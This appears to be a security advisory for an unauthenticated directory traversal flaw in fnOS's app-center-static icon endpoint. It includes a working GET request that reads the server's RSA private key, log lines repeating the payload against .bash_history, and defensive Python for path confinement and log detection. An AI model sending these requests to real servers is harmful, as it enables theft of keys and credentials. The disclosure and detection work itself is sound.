Vulnerability description
The app-center-static component of 飞牛系统 (fnOS) contains a directory traversal flaw that allows directory listing and arbitrary file reading. An unauthenticated attacker can use it to read any file on the server, such as the private key (/usr/trim/etc/rsa_private_key.pem), shell history (/root/.bash_history) and other sensitive data (/root/.psql_history), which may lead to full compromise of the server.
GET /app-center-static/serviceicon/myapp/{0}/?size=../../../../../../../../../../../../usr/trim/etc/rsa_private_key.pem HTTP/1.1
Host:
User-Agent: python-requests/2.32.5
Accept-Encoding: gzip, deflate, br
Accept: */*
Connection: keep-alive
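The request above passes a file path through the size parameter, and the handler joins it to its icon directory without confining the result. The example below is added here and is not code from fnOS or from the advisory: it shows the defensive resolution a static-file handler should perform (resolve the final path and refuse anything outside the icon root) and a small access-log check that flags requests of this shape. ICON_ROOT, the log lines and the log format are constructed for the example; the URL prefix and the size parameter come from the request shown on the page.

```python
import os
import re
from typing import List, Optional
from urllib.parse import parse_qs, unquote, urlsplit

# Hypothetical icon root; the real fnOS directory layout is not given on the page.
ICON_ROOT = "/srv/app-center-static/serviceicon"

# URL prefix taken from the request on the page.
ICON_URL_PREFIX = "/app-center-static/serviceicon/"

# Matches a ".." path component, e.g. "../x", "a/../x", "a/.."
TRAVERSAL_RE = re.compile(r"(^|/)\.\.(/|$)")


def resolve_icon_path(base_dir: str, requested: str) -> Optional[str]:
    """Return the absolute path for `requested` inside base_dir, or None if it escapes.

    This is the check the vulnerable handler lacks: the user-controlled value is
    joined to the base directory, fully normalised (symlinks and ".." included),
    and then required to still lie under the base directory.
    """
    base = os.path.realpath(base_dir)
    # Decode percent-encoding first so that "..%2F" cannot bypass the check,
    # and strip a leading "/" so an absolute path cannot replace the base.
    relative = unquote(requested).lstrip("/")
    candidate = os.path.realpath(os.path.join(base, relative))
    # commonpath rejects ".." escapes and prefix tricks such as "/srv/serviceicon-evil".
    if os.path.commonpath([base, candidate]) != base:
        return None
    return candidate


def is_traversal_request(target: str) -> bool:
    """True when a request target for the icon endpoint carries a traversal payload."""
    parts = urlsplit(target)
    if not parts.path.startswith(ICON_URL_PREFIX):
        return False
    if TRAVERSAL_RE.search(unquote(parts.path)):
        return True
    # parse_qs decodes one layer of percent-encoding; unquote again for double-encoding.
    for values in parse_qs(parts.query, keep_blank_values=True).values():
        for value in values:
            decoded = unquote(value)
            if TRAVERSAL_RE.search(decoded) or decoded.startswith("/"):
                return True
    return False


# Constructed access-log lines in common log format; the second and third
# reproduce the shape of the request shown on the page.
LOG_LINES = [
    '10.0.0.5 - - [01/Jan/2025:12:00:00 +0000] "GET /app-center-static/serviceicon/myapp/{0}/?size=64 HTTP/1.1" 200 1834',
    '10.0.0.9 - - [01/Jan/2025:12:00:01 +0000] "GET /app-center-static/serviceicon/myapp/{0}/?size=../../../../../../../../../../../../usr/trim/etc/rsa_private_key.pem HTTP/1.1" 200 1704',
    '10.0.0.9 - - [01/Jan/2025:12:00:02 +0000] "GET /app-center-static/serviceicon/myapp/{0}/?size=..%2F..%2F..%2Froot%2F.bash_history HTTP/1.1" 200 512',
    '10.0.0.7 - - [01/Jan/2025:12:00:03 +0000] "GET /index.html HTTP/1.1" 200 2048',
]

LOG_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')


def flag_log_lines(lines: List[str]) -> List[str]:
    """Return the request targets in `lines` that look like traversal attempts."""
    hits = []
    for line in lines:
        match = LOG_RE.search(line)
        if match and is_traversal_request(match.group("target")):
            hits.append(match.group("target"))
    return hits


if __name__ == "__main__":
    print(resolve_icon_path(ICON_ROOT, "myapp/64.png"))
    print(resolve_icon_path(ICON_ROOT, "../../../../usr/trim/etc/rsa_private_key.pem"))
    for hit in flag_log_lines(LOG_LINES):
        print("traversal attempt:", hit)
```

resolve_icon_path normalises before comparing, so an encoded or symlink-assisted escape is caught as well as a plain one, and the log check decodes the query twice so that a double-encoded payload does not slip past the regex.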